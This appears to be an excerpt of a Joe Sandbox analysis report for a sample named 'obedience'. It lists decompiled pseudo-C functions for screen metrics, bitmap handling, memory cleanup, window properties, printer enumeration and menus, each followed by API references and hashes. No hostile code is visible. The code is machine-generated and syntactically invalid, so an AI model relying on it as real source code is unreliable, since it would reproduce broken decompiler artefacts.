      			E0042794C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
      				intOrPtr* _v8;
      				intOrPtr _v12;
      				signed int _v16;
      				intOrPtr _v20;
      				signed int _v24;
      				signed int _v32;
      				signed short _v44;
      				int _t36;
      				signed int _t37;
      				signed short _t38;
      				signed int _t39;
      				signed short _t43;
      				signed int* _t47;
      				signed int _t51;
      				intOrPtr _t61;
      				void* _t67;
      				void* _t68;
      				void* _t69;
      				intOrPtr _t70;
      
      				_t68 = _t69;
      				_t70 = _t69 + 0xffffff8c;
      				_v16 = __ecx;
      				_v12 = __edx;
      				_v8 = __eax;
      				_t47 = _a8;
      				_v24 = _v16 << 4;
      				_v20 = E00408C10(_v24, __ecx, __edx, __eflags);
      				 *[fs:edx] = _t70;
      				_t51 = _v24;
      				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x427c4e, _t68, __edi, __esi, __ebx, _t67);
      				if(( *_t47 | _t47[1]) != 0) {
      					_t36 = _a4;
      					 *_t36 =  *_t47;
      					 *(_t36 + 4) = _t47[1];
      				} else {
      					 *_a4 = GetSystemMetrics(0xb);
      					_t36 = GetSystemMetrics(0xc);
      					 *(_a4 + 4) = _t36;
      				}
      				_push(0);
      				L00407658();
      				_v44 = _t36;
      				if(_v44 == 0) {
      					E00426DFC(_t51);
      				}
      				_push(_t68);
      				_push(0x427a35);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t70;
      				_push(0xe);
      				_t37 = _v44;
      				_push(_t37);
      				L00407348();
      				_push(0xc);
      				_t38 = _v44;
      				_push(_t38);
      				L00407348();
      				_t39 = _t37 * _t38;
      				if(_t39 <= 8) {
      					__eflags = 1;
      					_v32 = 1 << _t39;
      				} else {
      					_v32 = 0x7fffffff;
      				}
      				_pop(_t61);
      				 *[fs:eax] = _t61;
      				_push(0x427a3c);
      				_t43 = _v44;
      				_push(_t43);
      				_push(0);
      				L004078C0();
      				return _t43;
      			}

      APIs
      • GetSystemMetrics.USER32 ref: 0042799A
      • GetSystemMetrics.USER32 ref: 004279A6
      • 73BEAC50.USER32(00000000), ref: 004279C2
      • 73BEAD70.GDI32(00000000,0000000E,00000000,00427A35,?,00000000), ref: 004279E9
      • 73BEAD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00427A35,?,00000000), ref: 004279F6
      • 73BEB380.USER32(00000000,00000000,00427A3C,0000000E,00000000,00427A35,?,00000000), ref: 00427A2F
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MetricsSystem$B380
      • String ID:
      • API String ID: 3145338429-0
      • Opcode ID: 7a204e224ad6318cfd167f0949e7acb05993660fdf191624f6b93a5738e0c1c8
      • Instruction ID: b3ffd304a784558478ca0aaff8c0251e89a7260a022c18bacdd69187ac3f3fb4
      • Opcode Fuzzy Hash: 7a204e224ad6318cfd167f0949e7acb05993660fdf191624f6b93a5738e0c1c8
      • Instruction Fuzzy Hash: 6B314174F04218DFEB00EFA5D941AAEBBB5FB49310F50856AE914BB380C674A941CB65
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 74%
      			E00401CF4() {
      				void* _v8;
      				intOrPtr* _v12;
      				void* _t13;
      				void* _t15;
      				intOrPtr* _t18;
      				void* _t31;
      				void* _t37;
      				intOrPtr _t42;
      				void* _t44;
      				void* _t46;
      				intOrPtr _t47;
      
      				_t44 = _t46;
      				_t47 = _t46 + 0xfffffff8;
      				if( *0x4905c0 == 0) {
      					return _t13;
      				} else {
      					_push(_t44);
      					_push(E00401DE8);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t47;
      					if( *0x490049 != 0) {
      						_push(0x4905c8);
      						L004013FC();
      					}
      					 *0x4905c0 = 0;
      					_t15 =  *0x490620; // 0x808628
      					LocalFree(_t15);
      					 *0x490620 = 0;
      					_t18 =  *0x4905e8; // 0x809c5c
      					_v12 = _t18;
      					while(0x4905e8 != _v12) {
      						VirtualFree( *(_v12 + 8), 0, 0x8000);
      						_v12 =  *_v12;
      					}
      					E00401498(0x4905e8);
      					E00401498(0x4905f8);
      					E00401498(0x490624);
      					_t31 =  *0x4905e0; // 0x809628
      					_v8 = _t31;
      					while(_v8 != 0) {
      						 *0x4905e0 =  *_v8;
      						LocalFree(_v8);
      						_t37 =  *0x4905e0; // 0x809628
      						_v8 = _t37;
      					}
      					_pop(_t42);
      					 *[fs:eax] = _t42;
      					_push(0x401def);
      					if( *0x490049 != 0) {
      						_push(0x4905c8);
      						L00401404();
      					}
      					_push(0x4905c8);
      					L0040140C();
      					return 0;
      				}
      			}

      APIs
      • RtlEnterCriticalSection.KERNEL32(004905C8,00000000,00401DE8), ref: 00401D23
      • LocalFree.KERNEL32(00808628,00000000,00401DE8), ref: 00401D35
      • VirtualFree.KERNEL32(?,00000000,00008000,00808628,00000000,00401DE8), ref: 00401D59
      • LocalFree.KERNEL32(00000000,?,00000000,00008000,00808628,00000000,00401DE8), ref: 00401DAA
      • RtlLeaveCriticalSection.KERNEL32(004905C8,00401DEF,00808628,00000000,00401DE8), ref: 00401DD8
      • RtlDeleteCriticalSection.KERNEL32(004905C8,00401DEF,00808628,00000000,00401DE8), ref: 00401DE2
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
      • String ID:
      • API String ID: 3782394904-0
      • Opcode ID: 50acf7075c2b9cf25f1cc865c92697bc66a4d2ab7712ad971b840031530edc13
      • Instruction ID: 34fe96d851ba9aa5fcda36ec3b5851fb49b3a1fa2286b40976e443080b7ff627
      • Opcode Fuzzy Hash: 50acf7075c2b9cf25f1cc865c92697bc66a4d2ab7712ad971b840031530edc13
      • Instruction Fuzzy Hash: F0216675A00604BFEB51EBA9E885B6D7BE0EB19324F5100BBE404E72F1D738A940DB1C
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 45%
      			E00427DD8(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
      				char _v5;
      				struct HDC__* _v12;
      				struct HDC__* _v16;
      				struct HDC__* _t29;
      				struct tagBITMAPINFO* _t32;
      				intOrPtr _t39;
      				struct HBITMAP__* _t43;
      				void* _t46;
      
      				_t32 = __ecx;
      				_t43 = __eax;
      				E00427C88(__eax, _a4, __ecx);
      				_v12 = 0;
      				_push(0);
      				L00407280();
      				_v16 = 0;
      				_push(_t46);
      				_push(0x427e75);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t46 + 0xfffffff4;
      				if(__edx != 0) {
      					_push(0);
      					_push(__edx);
      					_t29 = _v16;
      					_push(_t29);
      					L00407420();
      					_v12 = _t29;
      					_push(_v16);
      					L004073F0();
      				}
      				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
      				_pop(_t39);
      				 *[fs:eax] = _t39;
      				_push(0x427e7c);
      				if(_v12 != 0) {
      					_push(0);
      					_push(_v12);
      					_push(_v16);
      					L00407420();
      				}
      				return DeleteDC(_v16);
      			}

      APIs
        • Part of subcall function 00427C88: GetObjectA.GDI32(?,00000054), ref: 00427C9C
      • 73BEA590.GDI32(00000000), ref: 00427DFA
      • 73BEB410.GDI32(?,?,00000000,00000000,00427E75,?,00000000), ref: 00427E1B
      • 73BEB150.GDI32(?,?,?,00000000,00000000,00427E75,?,00000000), ref: 00427E27
      • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00427E3E
      • 73BEB410.GDI32(?,00000000,00000000,00427E7C,?,00000000), ref: 00427E66
      • DeleteDC.GDI32(?), ref: 00427E6F
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B410$A590B150BitsDeleteObject
      • String ID:
      • API String ID: 3837315262-0
      • Opcode ID: 15518999b184c60d9ef3a8c8f52ffc7f597b2291debbefea5ec5f1d7c60b1202
      • Instruction ID: 50ad24d120df1170e5449d3e730bf90d1863c18885817c2408e14c7d9b906119
      • Opcode Fuzzy Hash: 15518999b184c60d9ef3a8c8f52ffc7f597b2291debbefea5ec5f1d7c60b1202
      • Instruction Fuzzy Hash: 8B118275F082147BDB10DBA9DC41F5FB7ECDB48704F5180AABA14E7281D678AD008768
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00441700(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
      				char _v8;
      				void* _t20;
      				void* _t21;
      				void* _t27;
      				void* _t31;
      				void* _t35;
      				intOrPtr* _t43;
      
      				_t43 =  &_v8;
      				_t20 =  *0x48ebd8; // 0x0
      				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
      				_t21 =  *0x48ebd8; // 0x0
      				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
      				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
      					SetWindowLongA(_a4, 0xfffffff4, _a4);
      				}
      				_t27 =  *0x48ebd8; // 0x0
      				SetPropA(_a4,  *0x490aea & 0x0000ffff, _t27);
      				_t31 =  *0x48ebd8; // 0x0
      				SetPropA(_a4,  *0x490ae8 & 0x0000ffff, _t31);
      				_t35 =  *0x48ebd8; // 0x0
      				 *0x48ebd8 = 0;
      				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
      				return  *_t43;
      			}


      APIs
      • SetWindowLongA.USER32 ref: 00441728
      • GetWindowLongA.USER32 ref: 00441733
      • GetWindowLongA.USER32 ref: 00441745
      • SetWindowLongA.USER32 ref: 00441758
      • SetPropA.USER32(?,00000000,00000000), ref: 0044176F
      • SetPropA.USER32(?,00000000,00000000), ref: 00441786
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: LongWindow$Prop
      • String ID:
      • API String ID: 3887896539-0
      • Opcode ID: 448ade05ee1e9ca47653a8de3d6cc964fe8d8abdd4dd27d12ac6f786a841e099
      • Instruction ID: 5cfb6933cf2a1a1025ea8312e11c37851685907db9f48b4bfc5932e3fd350c58
      • Opcode Fuzzy Hash: 448ade05ee1e9ca47653a8de3d6cc964fe8d8abdd4dd27d12ac6f786a841e099
      • Instruction Fuzzy Hash: CA11EF75604204BFEF00DF9DDC85EDA37A8AB08364F108565F915DB2A1D734F980DB68
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 87%
      			E004275F4(struct HDC__* __eax, signed int __ecx) {
      				char _v1036;
      				signed int _v1038;
      				struct tagRGBQUAD _v1048;
      				short _v1066;
      				short* _t15;
      				void* _t18;
      				struct HDC__* _t23;
      				void* _t26;
      				short* _t31;
      				short* _t32;
      
      				_t31 = 0;
      				 *_t32 = 0x300;
      				if(__eax == 0) {
      					_v1038 = __ecx;
      					E00402CEC(_t26, __ecx << 2,  &_v1036);
      				} else {
      					_push(0);
      					L00407280();
      					_t23 = __eax;
      					_t18 = SelectObject(__eax, __eax);
      					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
      					SelectObject(_t23, _t18);
      					DeleteDC(_t23);
      				}
      				if(_v1038 != 0) {
      					if(_v1038 != 0x10 || E0042755C(_t32) == 0) {
      						E004273EC( &_v1036, _v1038 & 0x0000ffff);
      					}
      					_t15 = _t32;
      					_push(_t15);
      					L004072B8();
      					_t31 = _t15;
      				}
      				return _t31;
      			}


      APIs
      • 73BEA590.GDI32(00000000,00000000,?,?,0042B1F3,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042760D
      • SelectObject.GDI32(00000000,00000000), ref: 00427616
      • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0042B1F3,?,?,?,?,00429DD7), ref: 0042762A
      • SelectObject.GDI32(00000000,00000000), ref: 00427636
      • DeleteDC.GDI32(00000000), ref: 0042763C
      • 73BEA8F0.GDI32(?,00000000,?,?,0042B1F3,?,?,?,?,00429DD7,00000000,00429E63), ref: 00427682
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ObjectSelect$A590ColorDeleteTable
      • String ID:
      • API String ID: 1056449717-0
      • Opcode ID: f023a3aa0607719df7c6fff00a2b46cf0e205a819bcbb28c157be9f047eebf0d
      • Instruction ID: a2141247f874ad801d69f0ae8385d9faad6a70220d4825ccee21831697022378
      • Opcode Fuzzy Hash: f023a3aa0607719df7c6fff00a2b46cf0e205a819bcbb28c157be9f047eebf0d
      • Instruction Fuzzy Hash: FF019B6160C32026D210776A9C47F5F71AC8FC0764F44C92FB944A72C1E57C984493AB
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00426CCC(void* __eax) {
      				void* _t36;
      
      				_t36 = __eax;
      				UnrealizeObject(E0042632C( *((intOrPtr*)(__eax + 0x14))));
      				SelectObject( *(_t36 + 4), E0042632C( *((intOrPtr*)(_t36 + 0x14))));
      				if(E0042640C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
      					SetBkColor( *(_t36 + 4),  !(E0042566C(E004262F0( *((intOrPtr*)(_t36 + 0x14))))));
      					return SetBkMode( *(_t36 + 4), 1);
      				} else {
      					SetBkColor( *(_t36 + 4), E0042566C(E004262F0( *((intOrPtr*)(_t36 + 0x14)))));
      					return SetBkMode( *(_t36 + 4), 2);
      				}
      			}


      APIs
        • Part of subcall function 0042632C: CreateBrushIndirect.GDI32(?), ref: 004263D6
      • UnrealizeObject.GDI32(00000000), ref: 00426CD8
      • SelectObject.GDI32(?,00000000), ref: 00426CEA
      • SetBkColor.GDI32(?,00000000), ref: 00426D0D
      • SetBkMode.GDI32(?,00000002), ref: 00426D18
      • SetBkColor.GDI32(?,00000000), ref: 00426D33
      • SetBkMode.GDI32(?,00000001), ref: 00426D3E
        • Part of subcall function 0042566C: GetSysColor.USER32(?), ref: 00425676
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
      • String ID:
      • API String ID: 3527656728-0
      • Opcode ID: 0e2e68183134a0f7bba3af10b8e8c1f1e0586bbbdd862bf785d011091185e2ca
      • Instruction ID: 91340de21108a0da904373c65ca48e0442af7e16a09023ef019208b95398bf07
      • Opcode Fuzzy Hash: 0e2e68183134a0f7bba3af10b8e8c1f1e0586bbbdd862bf785d011091185e2ca
      • Instruction Fuzzy Hash: 6BF0CDB17001109BDB00FFBAE9C6E0B7B9D9F0430978484AAB908DF19BC97DE8104779
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 51%
      			E0042F804(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				char _v16;
      				char* _v20;
      				intOrPtr* _v24;
      				intOrPtr* _v28;
      				char _v32;
      				char _v36;
      				signed int _v37;
      				char _v44;
      				char _v48;
      				char _v52;
      				char _v56;
      				intOrPtr _v60;
      				char _v64;
      				char _v68;
      				intOrPtr* _t76;
      				intOrPtr _t85;
      				intOrPtr _t99;
      				intOrPtr _t119;
      				char _t120;
      				intOrPtr* _t121;
      				void* _t124;
      				intOrPtr _t139;
      				intOrPtr _t144;
      				intOrPtr _t155;
      				intOrPtr _t156;
      				signed int _t161;
      				void* _t163;
      				void* _t164;
      				void* _t166;
      				void* _t167;
      				intOrPtr _t168;
      
      				_t166 = _t167;
      				_t168 = _t167 + 0xffffffc0;
      				_v48 = 0;
      				_v52 = 0;
      				_v44 = 0;
      				_v8 = __eax;
      				_push(_t166);
      				_push(0x42fa41);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t168;
      				if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
      					_v12 =  *((intOrPtr*)(_v8 + 0x10));
      					goto L19;
      				} else {
      					_t119 = E00403BC0(1);
      					 *((intOrPtr*)(_v8 + 0x10)) = _t119;
      					_v12 = _t119;
      					_push(_t166);
      					_push(0x42f9fb);
      					_push( *[fs:edx]);
      					 *[fs:edx] = _t168;
      					_t76 =  *0x48f9d4; // 0x48e0c8
      					if( *_t76 != 2) {
      						_t120 = 2;
      						_v37 = 5;
      					} else {
      						_t120 = 6;
      						_v37 = 4;
      					}
      					_v32 = 0;
      					_push( &_v36);
      					_push( &_v32);
      					_push(0);
      					_push(0);
      					_t161 = _v37 & 0x000000ff;
      					_push(_t161);
      					_push(0);
      					_push(_t120);
      					L0042ED00();
      					if(_v32 != 0) {
      						_v24 = E00402ACC(_v32, _t124, 0);
      						_push(_t166);
      						_push(0x42f9ea);
      						_push( *[fs:edx]);
      						 *[fs:edx] = _t168;
      						_push( &_v36);
      						_push( &_v32);
      						_push(_v32);
      						_t85 = _v24;
      						_push(_t85);
      						_push(_t161);
      						_push(0);
      						_push(_t120);
      						L0042ED00();
      						if(_t85 != 0) {
      							_v28 = _v24;
      							_t163 = _v36 - 1;
      							if(_t163 >= 0) {
      								_t164 = _t163 + 1;
      								do {
      									if(_v37 != 4) {
      										_t121 = _v28;
      										_v16 =  *((intOrPtr*)(_t121 + 4));
      										_v20 = E0042EE08( &_v16);
      										while( *_v20 != 0) {
      											_t99 =  *0x48f5ec; // 0x423b58
      											E00406A3C(_t99, 0,  &_v52);
      											_v68 =  *_t121;
      											_v64 = 6;
      											_v60 = _v20;
      											_v56 = 6;
      											E0040A164(_v52, 1,  &_v68,  &_v48);
      											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)))) + 0x3c))(E0042EF14(0, 1, _v20,  *_t121));
      											_v20 = E0042EE08( &_v16);
      										}
      										_v28 = _v28 + 0x14;
      									} else {
      										E00404C38( &_v44,  *_v28);
      										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)))) + 0x3c))(E0042EF14(0, 1, 0,  *_v28));
      										_v28 = _v28 + 0xc;
      									}
      									_t164 = _t164 - 1;
      								} while (_t164 != 0);
      							}
      							_pop(_t144);
      							 *[fs:eax] = _t144;
      							_push(0x42f9f1);
      							return E00402AFC(_v24);
      						} else {
      							E0040447C();
      							_pop(_t155);
      							 *[fs:eax] = _t155;
      							goto L19;
      						}
      					} else {
      						_pop(_t156);
      						 *[fs:eax] = _t156;
      						L19:
      						_pop(_t139);
      						 *[fs:eax] = _t139;
      						_push(0x42fa48);
      						return E00404A64( &_v52, 3);
      					}
      				}
      			}


      APIs
      • 73802130.WINSPOOL.DRV(00000002,00000000,?,00000000,00000000,?,?,00000000,0042F9FB,?,00000000,0042FA41,?,00000000), ref: 0042F892
      • 73802130.WINSPOOL.DRV(00000002,00000000,?,?,?,?,?,00000000,0042F9EA,?,00000002,00000000,?,00000000,00000000,?), ref: 0042F8D7
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: 73802130.
      • String ID: X;B$tzA$B
      • API String ID: 2384860516-3490348117
      • Opcode ID: 8620eb779e87f9c6371ea520bc3ca2c7d3658a830e49e9319ab66336d0e57859
      • Instruction ID: e5fe25428e6e30322374bc7cf80b7661a98e321c6739a1446e78aaa5a9c63bd6
      • Opcode Fuzzy Hash: 8620eb779e87f9c6371ea520bc3ca2c7d3658a830e49e9319ab66336d0e57859
      • Instruction Fuzzy Hash: D4718F71A04218AFDB01DF95E881B9EBBF9FB48310FA1847AE400E7351D738AD05CB69
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 91%
      			E0045E820(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
      				char _v8;
      				char _v12;
      				char _v16;
      				char _v20;
      				void* _t41;
      				void* _t54;
      				void* _t61;
      				struct HMENU__* _t64;
      				struct HMENU__* _t70;
      				intOrPtr _t77;
      				void* _t79;
      				intOrPtr _t81;
      				intOrPtr _t83;
      				intOrPtr _t87;
      				void* _t92;
      				intOrPtr _t97;
      				void* _t110;
      				intOrPtr _t112;
      				void* _t115;
      
      				_t93 = 0;
      				_v20 = 0;
      				_t112 = __edx;
      				_t92 = __eax;
      				_push(_t115);
      				_push(0x45e9e6);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t115 + 0xfffffff0;
      				if(__edx == 0) {
      					L7:
      					_t39 =  *((intOrPtr*)(_t92 + 0x248));
      					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
      						E004582B8(_t39, 0, 0);
      					}
      					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t112 != 0 && ( *(_t112 + 0x1c) & 0x00000008) != 0) {
      						_t112 = 0;
      					}
      					 *((intOrPtr*)(_t92 + 0x248)) = _t112;
      					if(_t112 != 0) {
      						E00422780(_t112, _t92);
      					}
      					if(_t112 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
      						_t41 = E0044B45C(_t92);
      						__eflags = _t41;
      						if(_t41 != 0) {
      							SetMenu(E0044B158(_t92), 0);
      						}
      						goto L30;
      					} else {
      						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
      							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
      								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
      								if( *((char*)(_t92 + 0x22f)) != 1) {
      									_t54 = E0044B45C(_t92);
      									__eflags = _t54;
      									if(_t54 != 0) {
      										SetMenu(E0044B158(_t92), 0);
      									}
      								}
      								goto L30;
      							}
      							goto L21;
      						} else {
      							L21:
      							if(E0044B45C(_t92) != 0) {
      								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
      								_t64 = GetMenu(E0044B158(_t92));
      								_t137 = _t61 - _t64;
      								if(_t61 != _t64) {
      									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
      									SetMenu(E0044B158(_t92), _t70);
      								}
      								E004582B8(_t112, E0044B158(_t92), _t137);
      							}
      							L30:
      							if( *((char*)(_t92 + 0x22e)) != 0) {
      								E0045F8EC(_t92, 1);
      							}
      							E0045E758(_t92);
      							_pop(_t97);
      							 *[fs:eax] = _t97;
      							_push(0x45e9ed);
      							return E00404A40( &_v20);
      						}
      					}
      				}
      				_t77 =  *0x490b80; // 0x2480e74
      				_t79 = E00462054(_t77) - 1;
      				if(_t79 >= 0) {
      					_v8 = _t79 + 1;
      					_t110 = 0;
      					do {
      						_t81 =  *0x490b80; // 0x2480e74
      						if(_t112 ==  *((intOrPtr*)(E00462040(_t81, _t110) + 0x248))) {
      							_t83 =  *0x490b80; // 0x2480e74
      							if(_t92 != E00462040(_t83, _t110)) {
      								_v16 =  *((intOrPtr*)(_t112 + 8));
      								_v12 = 0xb;
      								_t87 =  *0x48f64c; // 0x423d28
      								E00406A3C(_t87, _t93,  &_v20);
      								_t93 = _v20;
      								E0040CC28(_t92, _v20, 1, _t110, _t112, 0,  &_v16);
      								E004043D0();
      							}
      						}
      						_t110 = _t110 + 1;
      						_t10 =  &_v8;
      						 *_t10 = _v8 - 1;
      					} while ( *_t10 != 0);
      				}
      			}


      APIs
      • GetMenu.USER32(00000000), ref: 0045E944
      • SetMenu.USER32(00000000,00000000), ref: 0045E961
      • SetMenu.USER32(00000000,00000000), ref: 0045E996
      • SetMenu.USER32(00000000,00000000,00000000,0045E9E6), ref: 0045E9B2
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$LoadString
      • String ID: (=B
      • API String ID: 3688185913-992323144
      • Opcode ID: ca15dc53f8cda0c17e908ae54ccc02ddcd155d54cacbe03960d6ea68ad4c276b
      • Instruction ID: 6021b15d72f55bf27c98eda54257d4160799fd5eeae3d5cceddd7615dc897b90
